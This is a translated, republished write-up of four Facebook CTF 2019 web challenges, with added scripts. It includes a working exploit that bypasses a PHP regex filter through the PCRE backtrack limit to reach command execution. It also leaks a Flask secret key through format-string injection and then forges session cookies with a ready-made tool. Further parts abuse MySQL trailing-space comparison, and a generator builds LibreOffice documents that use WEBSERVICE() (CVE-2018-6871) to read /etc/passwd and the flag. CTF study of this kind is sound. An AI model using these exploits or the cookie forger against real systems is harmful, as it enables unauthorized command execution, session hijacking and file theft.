Facebook CTF2019 - Web

2019-06-16  About 498 words  Estimated reading time: 3 minutes

Notice: this article, "Facebook CTF2019 - Web", was first published by cru**** on 先知社区 (Xianzhi Community) on 2019-06-16 08:29:00, where it had 104 views.

Thanks to cru**** for the hard work!

rceservice

Challenge description:

We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only let you run 'ls'

http://challenges.fbctf.com:8085

(This problem does not require any brute force or scanning.
We will ban your team if we detect brute force or scanning).

The payload has to be sent as JSON.

We try ls first: {"cmd":"ls"}

Challenge source:

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

An aggressive blocklist: every shell builtin plus a character class that covers control characters, uppercase letters, digits and most punctuation (including / and ;).
But seeing preg_match brings to mind the PCRE issue phith0n (p神) wrote about: when a match exceeds pcre.backtrack_limit (default 1000000), preg_match() returns false instead of 1, and the elseif treats false as "no match", so execution falls through to json_decode() and system(). The exploit:

import requests

# A second key whose value is ~1,000,000 characters forces the regex engine past
# the PCRE backtracking limit; preg_match() returns false and the JSON is decoded
# and executed anyway. The full path is needed because PATH is jailed (see below).
payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'

res = requests.post("http://challenges.fbctf.com:8085/", data={"cmd":payload})
print(res.text)

A second method also exploits preg_match: the pattern is anchored with ^ and $ and has neither the /s nor the /m modifier, so . cannot cross a newline and the whole of ^.*(...).*$ has to fit on one line. Splitting the JSON over several lines (the opening brace, then "cmd":"...", then the closing brace on its own line) means the regex never matches, while json_decode() happily accepts the whitespace.

Trying a plain cat first returned a blank page.
Back in the source: putenv('PATH=/home/rceservice/jail') applies that jail to the current environment, and the challenge description says only ls is allowed, so the jail directory contains nothing but the ls binary. So we call cat by its absolute path: "cmd": "/bin/cat /home/rceservice/flag" (the slashes are what the character class blocks, which is why one of the two bypasses is needed in any case).

Note: Linux command locations: /bin and /usr/bin hold binaries for all users; /sbin and /usr/sbin hold system-administration binaries normally run by root.
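As an added example (not from the original writeup), here is the filter re-implemented with Python's re module so both bypasses can be reasoned about offline. The pattern is the challenge's PCRE pattern copied verbatim; the assumption is that it behaves the same under re as under PCRE for these tokens (no /s or /m, so . stops at a newline and ^ and $ anchor to the whole string). The multi-line payload can be checked locally; the backtracking-limit payload only takes effect in PHP, where preg_match() returns false, so the function just constructs it.

```python
import json
import re

# The challenge's preg_match() pattern, verbatim (PCRE and Python re agree on it).
BUILTINS = ("alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|"
            "declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|"
            "help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|"
            "readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|"
            "typeset|ulimit|umask|unalias|unset|until|wait|while")
FILTER = re.compile(r"^.*(" + BUILTINS + r"|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$")


def is_blocked(payload: str) -> bool:
    """True when the filter matches the raw JSON string (PHP prints 'Hacking attempt')."""
    return FILTER.search(payload) is not None


def decoded_cmd(payload: str) -> str:
    """What json_decode($json, true)['cmd'] yields for the same string."""
    return json.loads(payload)["cmd"]


def newline_bypass(cmd: str) -> str:
    """Spread the JSON over three lines.

    Without /s, '.' cannot cross '\\n', and without /m, '^' and '$' only match at the
    string ends, so ^.*(...).*$ cannot span the document; json_decode() does not care.
    """
    return "{\n" + '"cmd": ' + json.dumps(cmd) + "\n}"


def backtrack_bypass(cmd: str, padding: int = 1_000_000) -> str:
    """Pad the JSON so PHP's regex engine exceeds pcre.backtrack_limit.

    In PHP, preg_match() then returns false (not 0 or 1); false fails the elseif and
    the JSON is decoded anyway. Python's re has no such limit, so this payload can
    only be verified against PHP itself.
    """
    return json.dumps({"cmd": cmd, "zz": "a" * padding})


if __name__ == "__main__":
    for p in ('{"cmd":"ls"}',
              '{"cmd":"/bin/cat /home/rceservice/flag"}',
              newline_bypass("/bin/cat /home/rceservice/flag")):
        print(repr(p), "blocked" if is_blocked(p) else "passes")
```

Note that the slash in /bin/cat alone trips the character class, so the plain full-path payload is rejected; only the multi-line form passes the pattern while still decoding to the same command.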

events

Challenge description:

I heard cookies and string formatting are safe in 2019?

http://challenges.fbctf.com:8083

(This problem does not require any brute force or scanning. We will ban your team if we detect brute force or scanning).

Log in.

Look at the cookie:

ImEi.XP5j-w.rHcMilGKzEg1FYfcEOR6iqa-B9A

It has three dot-separated parts, which is the shape of a Flask session cookie signed with itsdangerous: payload, timestamp and HMAC signature. The first segment, ImEi, is plain URL-safe base64 and decodes to "a" (the user name we logged in with), so the payload is readable without any key; only forging a new signature needs the secret.
Submitting data, we notice three parameters are sent:

Since the hint mentions cookies and string formatting, and admin is the account we are not allowed to log in as, the plan is to tamper with the cookie to impersonate admin and then read the flag. The usual route is to leak the secret key through the formatting bug (Python's str.format() applied to user input lets a format field walk attribute chains such as __class__.__init__.__globals__), then re-sign a cookie with that key. So where is the injection?
After some trial and error, of the three parameters, event_important is the injectable one.

  • Entering __dict__ is reflected back successfully

  • Locate the app config: __class__.__init__.__globals__[app].config

  • Then sign a new cookie with the leaked key:

from flask import Flask
from flask.sessions import SecureCookieSessionInterface

# Secret key leaked through the format-string injection above
app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

# The same serializer Flask uses for its own session cookie (salt "cookie-session",
# HMAC-SHA1), so the output is a valid session for this app
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

# The captured cookie holds the bare string "a", so the forged one holds "admin"
print(session_serializer.dumps("admin"))

Replace the original user's cookie with the generated value and the flag is shown.
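As an added example that is not part of the original writeup, the cookie format is re-implemented here with only the standard library, so it can be inspected and forged without Flask installed. It assumes Flask's default session settings (itsdangerous URLSafeTimedSerializer, salt "cookie-session", "hmac" key derivation, SHA-1 digests); the captured cookie and leaked key below are the ones quoted on this page. The point it makes is that a Flask session is signed, not encrypted: anyone can read it, and anyone holding the secret key can mint one.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"  # Flask's fixed salt for the session cookie signer

# Values quoted on this page: the cookie observed after logging in as "a", and the
# secret key recovered through the format-string injection.
CAPTURED_COOKIE = "ImEi.XP5j-w.rHcMilGKzEg1FYfcEOR6iqa-B9A"
LEAKED_KEY = b"fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y"


def _b64e(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signing_key(secret_key: bytes) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()


def _signature(secret_key: bytes, value: str) -> bytes:
    return hmac.new(_signing_key(secret_key), value.encode("ascii"), hashlib.sha1).digest()


def read_session(cookie: str):
    """Return (payload, unix_timestamp) WITHOUT any key: the cookie is only signed."""
    value, _sig = cookie.rsplit(".", 1)
    payload_part, ts_part = value.rsplit(".", 1)
    if payload_part.startswith("."):  # Flask zlib-compresses large payloads
        raw = zlib.decompress(_b64d(payload_part[1:]))
    else:
        raw = _b64d(payload_part)
    return json.loads(raw), int.from_bytes(_b64d(ts_part), "big")


def forge_session(secret_key: bytes, payload, timestamp=None) -> str:
    """Sign an arbitrary session payload the way Flask's default session interface does."""
    ts = int(time.time()) if timestamp is None else timestamp
    body = json.dumps(payload, separators=(",", ":")).encode("utf-8")
    value = _b64e(body) + "." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    return value + "." + _b64e(_signature(secret_key, value))


def verify_session(secret_key: bytes, cookie: str):
    """Return the payload if the signature is valid under secret_key, else None."""
    value, sig_part = cookie.rsplit(".", 1)
    if not hmac.compare_digest(_signature(secret_key, value), _b64d(sig_part)):
        return None
    return read_session(cookie)[0]


if __name__ == "__main__":
    print("captured payload:", read_session(CAPTURED_COOKIE))
    print("leaked key signs captured cookie:", verify_session(LEAKED_KEY, CAPTURED_COOKIE) is not None)
    print("forged:", forge_session(LEAKED_KEY, "admin"))
```

verify_session(LEAKED_KEY, CAPTURED_COOKIE) is a cheap sanity check before forging: it returns "a" only if the key obtained through the injection is the one that actually signed the cookie.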

products manager

The challenge provides its source:

  • In db.php:
/*
INSERT INTO products VALUES('facebook', sha256(....), 'FLAG_HERE');
INSERT INTO products VALUES('messenger', sha256(....), ....);
INSERT INTO products VALUES('instagram', sha256(....), ....);
INSERT INTO products VALUES('whatsapp', sha256(....), ....);
INSERT INTO products VALUES('oculus-rift', sha256(....), ....);
*/

This reveals the table contents, and the hint could not be clearer. Now the main page:

Three functions; add creates a product.

view looks a product up.

Now look at view.php:

if (isset($name) && $name !== ""
        && isset($secret) && $secret !== "") {
    if (check_name_secret($name, hash('sha256', $secret)) === false) {
      return "Incorrect name or secret, please try again";
    }
    $product = get_product($name);
    echo "<p>Product details:";
    echo "<ul><li>" . htmlentities($product['name']) . "</li>";
    echo "<li>" . htmlentities($product['description']) . "</li></ul></p>";

check_name_secret in /db.php:

function check_name_secret($name, $secret) {
  global $db;
  $valid = false;
  $statement = $db->prepare(
    "SELECT name FROM products WHERE name = ? AND secret = ?"
  );
  check_errors($statement);
  $statement->bind_param("ss", $name, $secret);
  check_errors($statement->execute());
  $res = $statement->get_result();
  check_errors($res);
  if ($res->fetch_assoc() !== null) {
    $valid = true;
  }
  $statement->close();
  return $valid;
}

get_product in /db.php:

function get_product($name) {
  global $db;
  $statement = $db->prepare(
    "SELECT name, description FROM products WHERE name = ?"
  );
  check_errors($statement);
  $statement->bind_param("s", $name);
  check_errors($statement->execute());
  $res = $statement->get_result();
  check_errors($res);
  $product = $res->fetch_assoc();
  $statement->close();
  return $product;
}

check_name_secret() validates name and secret together, but get_product() then looks the product up by name alone, so the row that authenticated is not necessarily the row that gets displayed. What links the two is a MySQL comparison quirk: under the PAD SPACE collations that were the default before MySQL 8.0's utf8mb4_0900_ai_ci, trailing spaces are ignored when strings are compared with =, so 'facebook   ' = 'facebook' is true even though the stored values differ.

So we add a product named facebook followed by a few trailing spaces, with a secret we choose. Viewing it with that name and secret passes the check against our own row, but get_product()'s WHERE name = ? also matches the original facebook row, which was inserted first and is returned first, so the description holding the flag comes back.
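As an added example that is not part of the challenge source, the view flow is rebuilt below in Python on an in-memory SQLite database with a custom collation that emulates MySQL's PAD SPACE comparison (SQLite itself does not ignore trailing spaces). The product rows and their secrets are constructed stand-ins for the INSERTs in db.php, and view_fixed() is a suggested hardening rather than anything from the challenge: it authenticates and fetches in one statement, so the row whose secret matched is the row returned.

```python
import hashlib
import sqlite3


def pad_space(a: str, b: str) -> int:
    """Emulates a MySQL PAD SPACE collation: trailing spaces are insignificant."""
    a, b = a.rstrip(" "), b.rstrip(" ")
    return (a > b) - (a < b)


def sha256_hex(secret: str) -> str:
    return hashlib.sha256(secret.encode("utf-8")).hexdigest()


def build_db() -> sqlite3.Connection:
    """Products table with the challenge's shape and constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.create_collation("PADSPACE", pad_space)
    db.execute("CREATE TABLE products (name TEXT COLLATE PADSPACE, secret TEXT, description TEXT)")
    # Constructed stand-ins for the INSERTs in db.php; the secrets are unknown to the attacker.
    for name, description in [("facebook", "FLAG_HERE"), ("messenger", "chat app"),
                              ("instagram", "photos"), ("whatsapp", "messaging"),
                              ("oculus-rift", "vr headset")]:
        db.execute("INSERT INTO products VALUES (?, ?, ?)",
                   (name, sha256_hex("unknown-secret-" + name), description))
    return db


def check_name_secret(db, name: str, secret_hash: str) -> bool:
    """Mirror of the PHP check: name and secret must match together."""
    row = db.execute("SELECT name FROM products WHERE name = ? AND secret = ?",
                     (name, secret_hash)).fetchone()
    return row is not None


def get_product(db, name: str):
    """Mirror of the PHP lookup: by name only, first matching row wins."""
    return db.execute("SELECT name, description FROM products WHERE name = ?",
                      (name,)).fetchone()


def view(db, name: str, secret: str):
    """The vulnerable flow from view.php."""
    if not check_name_secret(db, name, sha256_hex(secret)):
        return None
    return get_product(db, name)


def view_fixed(db, name: str, secret: str):
    """Hardened: one query, so the authenticated row is the one displayed.

    Declaring the column with a NO PAD or binary collation (or a unique key on name)
    would close the trailing-space trick itself; this fix removes the check/fetch split.
    """
    return db.execute("SELECT name, description FROM products WHERE name = ? AND secret = ?",
                      (name, sha256_hex(secret))).fetchone()


def attack(db):
    """Add 'facebook' plus trailing spaces with a known secret, then view it."""
    db.execute("INSERT INTO products VALUES (?, ?, ?)",
               ("facebook   ", sha256_hex("attacker"), "mine"))
    return view(db, "facebook   ", "attacker")


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", attack(db))
    print("fixed:     ", view_fixed(db, "facebook   ", "attacker"))
```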

pdfme


Only .fods files can be uploaded; I found a template online:

<?xml version="1.0" encoding="UTF-8"?>
<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"  xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0"  xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"  xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0"  xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0"  xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0"  xmlns:xlink="http://www.w3.org/1999/xlink"  xmlns:dc="http://purl.org/dc/elements/1.1/"  xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0"  xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0"  xmlns:presentation="urn:oasis:names:tc:opendocument:xmlns:presentation:1.0"  xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0"  xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0"  xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0"  xmlns:math="http://www.w3.org/1998/Math/MathML"  xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0"  xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"  xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0"  xmlns:ooo="http://openoffice.org/2004/office"  xmlns:ooow="http://openoffice.org/2004/writer"  xmlns:oooc="http://openoffice.org/2004/calc"  xmlns:dom="http://www.w3.org/2001/xml-events"  xmlns:xforms="http://www.w3.org/2002/xforms"  xmlns:xsd="http://www.w3.org/2001/XMLSchema"  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  xmlns:rpt="http://openoffice.org/2005/report"  xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2"  xmlns:xhtml="http://www.w3.org/1999/xhtml"  xmlns:grddl="http://www.w3.org/2003/g/data-view#"  xmlns:tableooo="http://openoffice.org/2009/table"  xmlns:drawooo="http://openoffice.org/2010/draw"  xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0"  xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0"  
xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0"  xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0"  xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.spreadsheet">
    <office:body>
        <office:spreadsheet>
            <table:table table:name="1">
                <table:table-column/>
                <table:table-row>
                    <table:table-cell office:value-type="string" calcext:value-type="string">
                        <text:p>TEXT</text:p>
                    </table:table-cell>
                </table:table-row>
                <table:table-row></table:table-row>
            </table:table>
            <table:named-expressions/>
        </office:spreadsheet>
    </office:body>
</office:document>

The site renders it to a PDF:


Download the PDF and inspect its metadata with exiftool:

Noticing LibreOffice in the metadata, a search for related vulnerabilities leads to CVE-2018-6871, which is essentially a protocol-handling issue in Calc's WEBSERVICE() function. The documentation says:

For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.

LibreOffice did not enforce this restriction before 5.4.5 / 6.0.1, so on an older build WEBSERVICE() given a local path reads the file and places its contents in the cell.

Replace the table:table-cell element with the one below (the quotes inside the formula must be written as &quot;, because the formula lives in an XML attribute value):

<table:table-cell 
          table:formula="of:=COM.MICROSOFT.WEBSERVICE(&quot;/etc/passwd&quot;)" 
          office:value-type="string" 
          office:string-value="" 
          calcext:value-type="string">
       <text:p>#VALUE!</text:p>
     </table:table-cell>

The rendered PDF now shows the contents of /etc/passwd:

From the user accounts listed there, we try /home/libreoffice_admin/flag and read the flag.
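As an added example that is not part of the original writeup, here is a small generator for the exfiltration document, built with ElementTree so the attribute escaping is done by the serializer rather than by hand. It declares only the namespaces the payload uses; the assumption is that LibreOffice accepts this reduced header (the full declaration list from the template above can be substituted if not). The parse-back helpers show what the formula looks like to LibreOffice and that an unescaped quote inside the attribute is not well-formed XML at all.

```python
import xml.etree.ElementTree as ET

# Only the namespaces the payload uses (assumption: LibreOffice accepts this subset).
NS = {
    "office": "urn:oasis:names:tc:opendocument:xmlns:office:1.0",
    "table": "urn:oasis:names:tc:opendocument:xmlns:table:1.0",
    "text": "urn:oasis:names:tc:opendocument:xmlns:text:1.0",
    "calcext": "urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0",
}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)


def _tag(prefix: str, local: str) -> str:
    return "{%s}%s" % (NS[prefix], local)


def build_fods(path: str) -> bytes:
    """Flat ODS spreadsheet whose single cell calls WEBSERVICE() on a local path."""
    doc = ET.Element(_tag("office", "document"), {
        _tag("office", "version"): "1.2",
        _tag("office", "mimetype"): "application/vnd.oasis.opendocument.spreadsheet",
    })
    body = ET.SubElement(doc, _tag("office", "body"))
    sheet = ET.SubElement(body, _tag("office", "spreadsheet"))
    table = ET.SubElement(sheet, _tag("table", "table"), {_tag("table", "name"): "1"})
    ET.SubElement(table, _tag("table", "table-column"))
    row = ET.SubElement(table, _tag("table", "table-row"))
    # OpenFormula string literal: a double quote inside it is doubled; the XML
    # serializer then writes every " in the attribute as &quot;
    formula = 'of:=COM.MICROSOFT.WEBSERVICE("%s")' % path.replace('"', '""')
    cell = ET.SubElement(row, _tag("table", "table-cell"), {
        _tag("table", "formula"): formula,
        _tag("office", "value-type"): "string",
        _tag("office", "string-value"): "",
        _tag("calcext", "value-type"): "string",
    })
    ET.SubElement(cell, _tag("text", "p")).text = "#VALUE!"
    return ET.tostring(doc, encoding="utf-8", xml_declaration=True)


def extract_formula(data: bytes) -> str:
    """Parse a generated document and return the cell formula as LibreOffice sees it."""
    cell = ET.fromstring(data).find(".//table:table-cell", NS)
    return cell.get(_tag("table", "formula"))


def is_well_formed(data: bytes) -> bool:
    try:
        ET.fromstring(data)
        return True
    except ET.ParseError:
        return False


if __name__ == "__main__":
    with open("exfil.fods", "wb") as fh:
        fh.write(build_fods("/etc/passwd"))
```

Running the script writes exfil.fods, ready to upload; change the path argument to /home/libreoffice_admin/flag for the second round. A converter still on 5.4.5 / 6.0.1 or later returns #VALUE! for the same document, which is the quickest way to tell a patched backend from a vulnerable one.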

Keywords: ['Security techniques', 'CTF']


author

旭达网络

旭达网络 technical blog, recording all kinds of technical problems, each solved in a single post.
This article is licensed under the Creative Commons Attribution 4.0 International License.
